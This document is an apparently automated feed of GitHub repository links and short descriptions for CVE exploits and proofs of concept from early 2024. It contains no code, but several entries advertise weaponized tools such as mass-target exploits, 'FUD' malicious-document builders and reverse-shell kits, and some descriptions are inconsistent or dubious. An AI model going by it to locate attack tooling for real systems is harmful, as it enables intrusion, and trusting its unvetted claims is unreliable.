**no description** : [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665) create time: 2024-03-11T04:46:19Z

**CVE-2024-21762 is an out of bounds write vulnerability in fortinet fortios which leads to unauthenticated remote code execution** : [t4ril/CVE-2024-21762-PoC](https://github.com/t4ril/CVE-2024-21762-PoC) create time: 2024-03-11T02:31:58Z

**Arbitrary Code Execution on FuguHub 8.4** : [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697) create time: 2024-03-09T22:24:03Z

**An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.** : [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475) create time: 2024-03-10T22:51:05Z

**The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.** : [rxerium/CVE-2023-6000](https://github.com/rxerium/CVE-2023-6000) create time: 2024-03-10T16:20:22Z

**An exploit for CVE-2017-15428** : [Michelangelo-S/CVE-2017-15428](https://github.com/Michelangelo-S/CVE-2017-15428) create time: 2024-03-10T14:53:53Z

**CVE-2024-23113 Exploit with More than 20000 Targets** : [labesterOct/CVE-2024-23113](https://github.com/labesterOct/CVE-2024-23113) create time: 2024-03-10T07:34:29Z

**CVE-2024-23113 FortiOS SSL VPN RCE** : [foxymoxxy/CVE-2024-23113-POC](https://github.com/foxymoxxy/CVE-2024-23113-POC) create time: 2024-03-10T06:56:29Z

**CVE-2024-20337 POC Cisco Secure Client CRLF RCE and unauthorized remote access to VPN sessions** : [swagcraftedd/CVE-2024-20337-POC](https://github.com/swagcraftedd/CVE-2024-20337-POC) create time: 2024-03-10T06:13:09Z

**Demo showing Claude Opus does not find CVE-2023-0266** : [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266) create time: 2024-03-10T04:41:34Z

**no description** : [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT) create time: 2024-03-09T22:04:07Z

**no description** : [cvedayprotech3s/cve-2024-23113](https://github.com/cvedayprotech3s/cve-2024-23113) create time: 2024-03-09T18:17:48Z

**Research of CVE-2023-3824 (NCA - Lockbit)** : [NewLockBit/Research-of-CVE-2023-3824-NCA-Lockbit](https://github.com/NewLockBit/Research-of-CVE-2023-3824-NCA-Lockbit) create time: 2024-03-09T09:07:09Z

**no description** : [NewLockBit/CVE-2023-3824-PHP-to-RCE-National-Crime-AgencyLEAK](https://github.com/NewLockBit/CVE-2023-3824-PHP-to-RCE-National-Crime-AgencyLEAK) create time: 2024-03-09T08:23:09Z

**no description** : [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453) create time: 2024-03-09T05:15:02Z

**CVEHub of CVE-2023-1498 and CVE-2023-1500** : [Decemberus/BugHub](https://github.com/Decemberus/BugHub) create time: 2023-03-19T09:06:59Z

**no description** : [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE) create time: 2024-03-09T04:04:23Z

**CVE-2024-23113 FortiOS SSL VPN RCE** : [tr1pl3ight/CVE-2024-23113-POC](https://github.com/tr1pl3ight/CVE-2024-23113-POC) create time: 2024-03-09T03:07:19Z

**Exploit CVE-2023-45318-POC Weston Embedded uC-HTTP git commit 80d4004 ---> RCE** : [greandfather/CVE-2023-50358-POC-RCE](https://github.com/greandfather/CVE-2023-50358-POC-RCE) create time: 2024-03-08T21:23:16Z

**Exploit CVE-2023-45318-POC Weston Embedded uC-HTTP git commit 80d4004 ---> RCE** : [greandfather/CVE-2023-45318-POC-RCE](https://github.com/greandfather/CVE-2023-45318-POC-RCE) create time: 2024-03-08T21:00:15Z

**A Remote Code Execution (RCE) vulnerability impacting Microsoft Exchange Server CVE-2023-21529 POC** : [tr1pl3ight/CVE-2023-21529-POC](https://github.com/tr1pl3ight/CVE-2023-21529-POC) create time: 2024-03-08T16:01:54Z

**https://github.com/Phamchie/CVE-2023-3047** : [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie) create time: 2024-03-08T15:20:25Z

**CVE-2024-22252 VMware ESXi, Workstation RCE on HOST** : [crackmapEZec/CVE-2024-22252-POC](https://github.com/crackmapEZec/CVE-2024-22252-POC) create time: 2024-03-08T15:45:39Z

**no description** : [cvedayprotech/CVE-2024-23113](https://github.com/cvedayprotech/CVE-2024-23113) create time: 2024-03-08T15:34:17Z

**EXPLOIT Roundcube vulnerability POC (CVE-2023-5631)** : [greandfather/EXPLOIT-Roundcube-vulnerability-POC-CVE-2023-5631-](https://github.com/greandfather/EXPLOIT-Roundcube-vulnerability-POC-CVE-2023-5631-) create time: 2024-03-08T14:50:50Z

**CVE-2024-22252 VMware ESXi, Workstation RCE on HOST** : [crackmapEZec/CVE-2024-22252-POC](https://github.com/crackmapEZec/CVE-2024-22252-POC) create time: 2024-03-08T14:58:57Z

**no description** : [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE) create time: 2024-03-08T12:40:09Z

**Netbox - CVE-2024-23780** : [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780) create time: 2024-03-08T10:39:59Z

**Three go-exploits exploiting CVE-2023-22527 to execute arbitrary code in memory** : [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527) create time: 2024-03-04T19:09:57Z

**no description** : [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393) create time: 2024-03-08T08:45:12Z

**Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an "Admin Member JSON Update" issue.** : [hacker625/CVE-2019-17225](https://github.com/hacker625/CVE-2019-17225) create time: 2024-03-08T03:51:32Z

**Real proof-of-concept out-of-bound write vuln in FortiOS ---> RCE** : [RequestXss/CVE-2024-21762-Exploit-POC](https://github.com/RequestXss/CVE-2024-21762-Exploit-POC) create time: 2024-03-07T22:51:59Z

**CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability Zero-day** : [crackmapEZec/CVE-2024-21338-POC](https://github.com/crackmapEZec/CVE-2024-21338-POC) create time: 2024-03-07T20:09:35Z

**Here's a brief description of CVE-2024-28213: "CVE-2024-28213 is a critical vulnerability affecting versions prior to 3.5.9 of nGrinder. It allows unauthenticated users to send serialized Java objects to the application, potentially leading to the execution of arbitrary code through unsafe Java object deserialization.** : [0x1x02/CVE-2024-28213](https://github.com/0x1x02/CVE-2024-28213) create time: 2024-03-07T17:38:41Z

**no description** : [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047) create time: 2024-03-07T14:46:22Z

**A PoC for CVE-2024-27198 written in golang** : [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198) create time: 2024-03-07T15:12:56Z

**no description** : [bsekercioglu/cve2024-21762-ShodanChecker](https://github.com/bsekercioglu/cve2024-21762-ShodanChecker) create time: 2024-03-07T13:13:21Z

**Demonstrates critical vulnerability allowing unauthorized access to GL.iNet router web interface without valid credentials. Exploit targets CVE-2023-46453** : [0x1x02/GLiNet-Router-Auth-Bypass](https://github.com/0x1x02/GLiNet-Router-Auth-Bypass) create time: 2024-03-07T08:05:31Z

**no description** : [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386) create time: 2024-03-07T06:35:33Z

**no description** : [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674) create time: 2024-03-07T05:43:48Z

**proof-of-concept out-of-bound write vuln in FortiOS ---> RCE** : [c0d3b3af/CVE-2024-21762-Exploit](https://github.com/c0d3b3af/CVE-2024-21762-Exploit) create time: 2024-03-06T21:39:22Z

**Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c** : [zhsh9/CVE-2014-6287](https://github.com/zhsh9/CVE-2014-6287) create time: 2024-03-06T20:55:08Z

**CyberPunk Style CVE-2017-16651 Roundcube Webmail Exploit** : [sephiroth950911/CVE-2017-16651-Exploit](https://github.com/sephiroth950911/CVE-2017-16651-Exploit) create time: 2024-03-06T18:53:06Z

**no description** : [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246) create time: 2024-03-02T15:45:52Z

**Progress OpenEdge Authentication Bypass** : [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403) create time: 2024-03-06T15:27:18Z

**no description** : [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc) create time: 2024-03-06T11:23:11Z

**no description** : [ASR511-OO7/CVE-2024-24104](https://github.com/ASR511-OO7/CVE-2024-24104) create time: 2024-03-06T11:23:03Z

**no description** : [ASR511-OO7/CVE-2024-24105](https://github.com/ASR511-OO7/CVE-2024-24105) create time: 2024-03-06T11:17:07Z

**no description** : [ASR511-OO7/CVE-2024-24108](https://github.com/ASR511-OO7/CVE-2024-24108) create time: 2024-03-06T11:14:39Z

**no description** : [ASR511-OO7/CVE-2024-25250.](https://github.com/ASR511-OO7/CVE-2024-25250.) create time: 2024-03-06T11:11:24Z

**PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3** : [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC) create time: 2024-03-06T04:11:59Z

**CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4** : [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE) create time: 2024-03-06T03:15:03Z

**CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability** : [gogobuster/CVE-2024-21338-POC](https://github.com/gogobuster/CVE-2024-21338-POC) create time: 2024-03-05T18:29:55Z

**Proof of Concept for Authentication Bypass in JetBrains TeamCity Pre-2023.11.4** : [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198) create time: 2024-03-04T22:44:36Z

**Junos OS CVE-2024-21591 POC RCE** : [gogobuster/CVE-2024-21591-POC](https://github.com/gogobuster/CVE-2024-21591-POC) create time: 2024-03-05T18:19:59Z

**CVE-2024-20291-POC exploit ---> RCE** : [BetterCzz/CVE-2024-20291-POC](https://github.com/BetterCzz/CVE-2024-20291-POC) create time: 2024-03-03T05:25:35Z

**New exploit for admin access to QNAP OS (CVE-2023-50358)** : [greandfather/CVE-2023-50358-POC](https://github.com/greandfather/CVE-2023-50358-POC) create time: 2024-03-05T16:01:33Z

**New exploit for admin access to QNAP OS (CVE-2023-50358)** : [greandfather/POC-New-exploit-for-admin-access-to-QNAP-OS-CVE-2023-50358-](https://github.com/greandfather/POC-New-exploit-for-admin-access-to-QNAP-OS-CVE-2023-50358-) create time: 2024-03-05T15:16:56Z

**no description** : [Shubham-2k1/Exploit-CVE-2011-2523](https://github.com/Shubham-2k1/Exploit-CVE-2011-2523) create time: 2024-03-05T10:31:42Z

**Security Vulnerabilities of Software Programs and Web Applications** : [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752) create time: 2024-03-05T09:54:00Z

**The Blue0DAY tool implements Unauthenticated Peering, leading to code execution via HID keyboard in Bluetooth CVE-2023-45866. 🚨** : [R4HUL-INDIAN/Blue0DAY](https://github.com/R4HUL-INDIAN/Blue0DAY) create time: 2024-03-05T08:26:57Z

**ActiveMQ RCE (CVE-2023-46604) 回显利用工具** : [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit) create time: 2024-03-05T07:09:21Z

**CVE-2024-27198 - Authentication Bypass Using an Alternate Path vulnerability in JetBrains TeamCity Server** : [labesterOct/CVE-2024-27198](https://github.com/labesterOct/CVE-2024-27198) create time: 2024-03-05T07:57:29Z

**Exploit for CVE-2024-27198 - TeamCity Server** : [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198) create time: 2024-03-05T05:43:06Z

**no description** : [tucommenceapousser/CVE-2024-27198](https://github.com/tucommenceapousser/CVE-2024-27198) create time: 2024-03-05T00:39:20Z

**no description** : [K3ysTr0K3R/CVE-2021-43798-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT) create time: 2024-03-04T18:32:21Z

**CVE-2024-1071 with Docker** : [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker) create time: 2024-03-04T18:29:17Z

**This script will help you to scan for smbGhost vulnerability(CVE-2020-0796)** : [AdamSonov/smbGhostCVE-2020-0796](https://github.com/AdamSonov/smbGhostCVE-2020-0796) create time: 2024-03-04T16:59:53Z

**The Blue0DAY tool implements Unauthenticated Peering, leading to code execution via HID keyboard in Bluetooth CVE-2023-45866. 🚨** : [R4HUL-INDIAN/Blue0DAY](https://github.com/R4HUL-INDIAN/Blue0DAY) create time: 2024-03-04T13:55:16Z

**Execute arbitrary code on the victim’s device, compromising data security and system integrity in Chrome 120.0.6099** : [JohnHormond/CVE-2024-0519-Chrome-exploit](https://github.com/JohnHormond/CVE-2024-0519-Chrome-exploit) create time: 2024-03-04T10:25:06Z

**0day for Citrix Netscaler ADC and NetScaler Gateway latest versions** : [Roonye660/CVE-2023-6548-POC](https://github.com/Roonye660/CVE-2023-6548-POC) create time: 2024-03-04T08:57:27Z

**Roblox vulnerability that allows injection into the roblox client VIA P.A.N.C.R.A.B method** : [RobloxSecurityResearcher/RobloxVulnerabilityCVE-2024-0001](https://github.com/RobloxSecurityResearcher/RobloxVulnerabilityCVE-2024-0001) create time: 2024-03-04T05:40:39Z

**CVE-2024-2074** : [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074) create time: 2024-02-29T12:30:37Z

**mailcow: Docker Container Exposure to Local Network** : [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760) create time: 2024-03-04T00:53:35Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Soradotos/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Soradotos/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-03T19:40:14Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Soradotos/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Soradotos/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-03T19:40:13Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Soradotos/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Soradotos/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-03T19:40:13Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Soradotos/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Soradotos/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-03T19:40:13Z

**CVE-2024-21762 POC Forti VPN SSL Out of Boundary RCE** : [tr1pl3ight/CVE-2024-21762-POC](https://github.com/tr1pl3ight/CVE-2024-21762-POC) create time: 2024-03-03T17:01:56Z

**Vulnerability POC for CVE-2023-34845** : [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845) create time: 2024-03-03T10:50:16Z

**CVE-2024-20291-POC exploit ---> RCE** : [greandfather/CVE-2024-20291-POC](https://github.com/greandfather/CVE-2024-20291-POC) create time: 2024-03-03T00:04:40Z

**no description** : [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437) create time: 2024-03-02T21:09:07Z

**Exploiting the pre-authentication code execution vulnerability found on RV130 cisco routers in 2019.** : [Oraxiage/CVE-2019-1663](https://github.com/Oraxiage/CVE-2019-1663) create time: 2024-03-02T09:15:26Z

**no description** : [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595) create time: 2024-03-02T07:35:29Z

**CVE-2024-1709 ConnectWise ScreenConnect auth bypass patch WORK 2.0** : [tr1pl3ight/POCv2.0-for-CVE-2024-1709](https://github.com/tr1pl3ight/POCv2.0-for-CVE-2024-1709) create time: 2024-03-02T05:46:40Z

**CVE-2024-25731** : [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc) create time: 2024-02-06T04:38:12Z

**ArcSight ESM up to 24.0 information disclosure proof-of-concept** : [Oxdestiny/CVE-2024-0967-exploit](https://github.com/Oxdestiny/CVE-2024-0967-exploit) create time: 2024-03-01T22:31:38Z

**POC for CVE-2023-47218** : [gogobuster/CVE-2023-47218-POC](https://github.com/gogobuster/CVE-2023-47218-POC) create time: 2024-03-01T22:12:56Z

**Microsoft Exchange server Privilege Escalation - WORK!!** : [FreakyM0ndy/CVE-2024-21410-poc](https://github.com/FreakyM0ndy/CVE-2024-21410-poc) create time: 2024-03-01T21:37:33Z

**Microsoft Exchange Server Privilege Escalation - WORK!!** : [FreakyMondy/CVE-2024-21410](https://github.com/FreakyMondy/CVE-2024-21410) create time: 2024-03-01T20:49:11Z

**POC for CVE-2024-21672** : [swagcrafted/CVE-2024-21672-POC](https://github.com/swagcrafted/CVE-2024-21672-POC) create time: 2024-03-01T20:42:59Z

**CVE-2024-21762 proof of concept is an exploitation out of bound write vulnerability in fortinet SSL VPN which leads to unauthenticated RCE if successfully explited.** : [tr1pl3ight/CVE-2024-21762-POC](https://github.com/tr1pl3ight/CVE-2024-21762-POC) create time: 2024-03-01T19:56:28Z

**JetStream Smart Switch - TL-SG2210P v5.0/ Improper Access Control / CVE-2023-43318** : [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318) create time: 2024-03-01T11:35:47Z

**PoC for CVE-2024-1512 in MasterStudy LMS WordPress Plugin.** : [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512) create time: 2024-03-01T11:08:37Z

**Safely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762** : [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check) create time: 2024-02-28T21:16:10Z

**no description** : [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626) create time: 2024-03-01T09:58:50Z

**no description** : [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652) create time: 2024-03-01T09:50:00Z

**A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)** : [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT) create time: 2024-03-01T09:28:08Z

**Python program to dump all the databases, exploiting NagiosXI sqli vulnerability** : [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084) create time: 2024-03-01T04:06:15Z

**Actual working exploit for CVE-2021-3345** : [SpiralBL0CK/CVE-2021-3345](https://github.com/SpiralBL0CK/CVE-2021-3345) create time: 2024-02-29T22:05:44Z

**(Mirorring)** : [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE) create time: 2024-02-29T20:53:42Z

**(Mirorring)** : [hy011121/CVE-2024-1651-exploit-RCE-](https://github.com/hy011121/CVE-2024-1651-exploit-RCE-) create time: 2024-02-29T20:06:30Z

**Using CVE-2023-2640 CVE-2023-3262 to escalate previleges** : [SanjayRagavendar/UbuntuPrivilegeEscalationV1](https://github.com/SanjayRagavendar/UbuntuPrivilegeEscalationV1) create time: 2024-02-29T16:04:58Z

**no description** : [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413) create time: 2024-02-29T10:07:34Z

**Apache Solr Backup/Restore APIs RCE Poc (CVE-2023-50386)** : [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC) create time: 2024-02-29T08:57:47Z

**no description** : [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386) create time: 2024-02-29T06:22:50Z

**no description** : [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407) create time: 2024-01-24T09:39:11Z

**CVE-2024-23334** : [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334) create time: 2024-02-28T22:30:21Z

**no description** : [thebunjo/CVE-2020-35489](https://github.com/thebunjo/CVE-2020-35489) create time: 2024-02-28T21:29:06Z

**WordPress LiteSpeed Plugin Vulnerability** : [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000) create time: 2024-02-28T19:36:40Z

**no description** : [c0d3b3af/CVE-2024-21762-POC](https://github.com/c0d3b3af/CVE-2024-21762-POC) create time: 2024-02-28T18:35:52Z

**no description** : [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc) create time: 2024-02-28T16:07:37Z

**no description** : [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757) create time: 2024-02-28T08:58:31Z

**no description** : [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993) create time: 2024-02-28T08:27:43Z

**no description** : [nidhi7598/linux-4.19.72_lib_CVE-2022-0847](https://github.com/nidhi7598/linux-4.19.72_lib_CVE-2022-0847) create time: 2023-11-14T05:14:22Z

**CVE-2024-21413 exploit** : [DevAkabari/CVE-2024-21413](https://github.com/DevAkabari/CVE-2024-21413) create time: 2024-02-28T07:26:24Z

**Don't use it! It was manipulated for testing the CVE-2016-4490.** : [MarsMan13/test-binutils-2.26](https://github.com/MarsMan13/test-binutils-2.26) create time: 2024-02-28T01:07:21Z

**no description** : [Gh71m/CVE-2024-21762-POC](https://github.com/Gh71m/CVE-2024-21762-POC) create time: 2024-02-27T22:07:01Z

**Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.** : [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC) create time: 2024-02-27T15:25:58Z

**no description** : [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877) create time: 2024-02-27T15:09:50Z

**POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.** : [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC) create time: 2024-02-27T14:48:19Z

**dpx file format parser + mallicous crafter for CVE-2017-2903** : [SpiralBL0CK/dpx_work_CVE-2017-2903](https://github.com/SpiralBL0CK/dpx_work_CVE-2017-2903) create time: 2024-02-27T12:55:32Z

**Ultimate Member Unauthorized Database Access / SQLi** : [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071) create time: 2024-02-27T11:41:53Z

**CVE-2023-6654 EXP** : [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654) create time: 2024-02-27T07:50:01Z

**no description** : [letsr00t/CVE-2021-22555](https://github.com/letsr00t/CVE-2021-22555) create time: 2024-02-27T05:22:13Z

**Exploit for CVE-2022-30525** : [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit) create time: 2024-02-27T03:31:37Z

**no description** : [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118) create time: 2024-02-27T03:59:23Z

**Auto exploitation tool for CVE-2024-24401.** : [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401) create time: 2024-02-18T20:05:46Z

**A Craft CMS vulnerability that allows Remote Code Execution (RCE).** : [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892) create time: 2024-02-26T18:31:46Z

**Html Injection vulnearbility** : [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521) create time: 2024-02-16T05:40:33Z

**poc of CVE-2023-52160** : [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn) create time: 2024-02-26T12:48:07Z

**(XSS)** : [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560) create time: 2024-02-26T12:03:43Z

**(XSS)** : [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535) create time: 2024-02-26T12:02:10Z

**no description** : [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534) create time: 2024-02-26T11:59:59Z

**confluence CVE-2023-22527 漏洞利用工具,支持冰蝎/哥斯拉内存马注入,支持设置 http 代理** : [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL) create time: 2024-02-26T02:34:44Z

**This is an exploit script for CVE-2024-23897, a vulnerability affecting certain systems. The script is intended for educational and testing purposes only. Ensure that you have the necessary permissions before using it.** : [Abo5/CVE-2024-23897](https://github.com/Abo5/CVE-2024-23897) create time: 2024-02-26T03:07:28Z

**no description** : [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0) create time: 2024-02-25T12:28:49Z

**no description** : [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0) create time: 2024-02-25T12:21:40Z

**Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.** : [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346) create time: 2024-02-25T11:51:03Z

**no description** : [ASR511-OO7/CVE-2022-46088](https://github.com/ASR511-OO7/CVE-2022-46088) create time: 2024-02-25T09:24:51Z

**no description** : [ASR511-OO7/CVE-2022-46089](https://github.com/ASR511-OO7/CVE-2022-46089) create time: 2024-02-25T09:23:52Z

**no description** : [ASR511-OO7/CVE-2022-46091](https://github.com/ASR511-OO7/CVE-2022-46091) create time: 2024-02-25T09:23:01Z

**no description** : [ASR511-OO7/CVE-2022-46497](https://github.com/ASR511-OO7/CVE-2022-46497) create time: 2024-02-25T09:21:29Z

**no description** : [ASR511-OO7/CVE-2022-46498](https://github.com/ASR511-OO7/CVE-2022-46498) create time: 2024-02-25T09:20:32Z

**no description** : [ASR511-OO7/CVE-2022-46499](https://github.com/ASR511-OO7/CVE-2022-46499) create time: 2024-02-25T09:19:32Z

**no description** : [ASR511-OO7/CVE-2023-33676](https://github.com/ASR511-OO7/CVE-2023-33676) create time: 2024-02-25T09:18:38Z

**no description** : [ASR511-OO7/CVE-2023-33677](https://github.com/ASR511-OO7/CVE-2023-33677) create time: 2024-02-25T09:17:48Z

**no description** : [ASR511-OO7/CVE-2023-41014](https://github.com/ASR511-OO7/CVE-2023-41014) create time: 2024-02-25T09:16:50Z

**no description** : [ASR511-OO7/CVE-2023-41015](https://github.com/ASR511-OO7/CVE-2023-41015) create time: 2024-02-25T09:15:54Z

**no description** : [ASR511-OO7/CVE-2023-41503](https://github.com/ASR511-OO7/CVE-2023-41503) create time: 2024-02-25T09:14:58Z

**no description** : [ASR511-OO7/CVE-2023-41504](https://github.com/ASR511-OO7/CVE-2023-41504) create time: 2024-02-25T09:13:57Z

**no description** : [ASR511-OO7/CVE-2023-41505](https://github.com/ASR511-OO7/CVE-2023-41505) create time: 2024-02-25T09:12:31Z

**no description** : [ASR511-OO7/CVE-2023-41506](https://github.com/ASR511-OO7/CVE-2023-41506) create time: 2024-02-25T09:11:36Z

**no description** : [ASR511-OO7/CVE-2024-22917](https://github.com/ASR511-OO7/CVE-2024-22917) create time: 2024-02-25T09:10:40Z

**no description** : [ASR511-OO7/CVE-2024-24095](https://github.com/ASR511-OO7/CVE-2024-24095) create time: 2024-02-25T09:08:37Z

**no description** : [ASR511-OO7/CVE-2024-24096](https://github.com/ASR511-OO7/CVE-2024-24096) create time: 2024-02-25T09:07:19Z

**no description** : [ASR511-OO7/CVE-2024-24099](https://github.com/ASR511-OO7/CVE-2024-24099) create time: 2024-02-25T09:03:38Z

**no description** : [ASR511-OO7/CVE-2024-24100](https://github.com/ASR511-OO7/CVE-2024-24100) create time: 2024-02-25T09:02:08Z

**Ivanti Pulse Secure Client Connect Local Privilege Escalation CVE-2023-38041 Proof of Concept** : [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC) create time: 2024-02-25T08:09:17Z

**Exploitation Scanner CVE-2020-3452 to enumerate the standard files accessible in the Path Traversal of CISCO ASA/FTD .🔥** : [imhunterand/CVE-2020-3452](https://github.com/imhunterand/CVE-2020-3452) create time: 2024-02-25T04:12:59Z

**CVE-2020-10189: Microsoft Windows SMBv3 Remote Code Execution (RCE)** : [BLACKpwn/Remote_Code_Execution-](https://github.com/BLACKpwn/Remote_Code_Execution-) create time: 2024-02-25T03:56:53Z

**Passive version detection method for CVE-2023-22515 using Nuclei scanner** : [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515) create time: 2024-02-24T16:04:35Z

**CVE-2024-21887 Exploitation with Ngrok Reverse Shell** : [pwniel/ivanti_shell](https://github.com/pwniel/ivanti_shell) create time: 2024-02-24T12:55:43Z

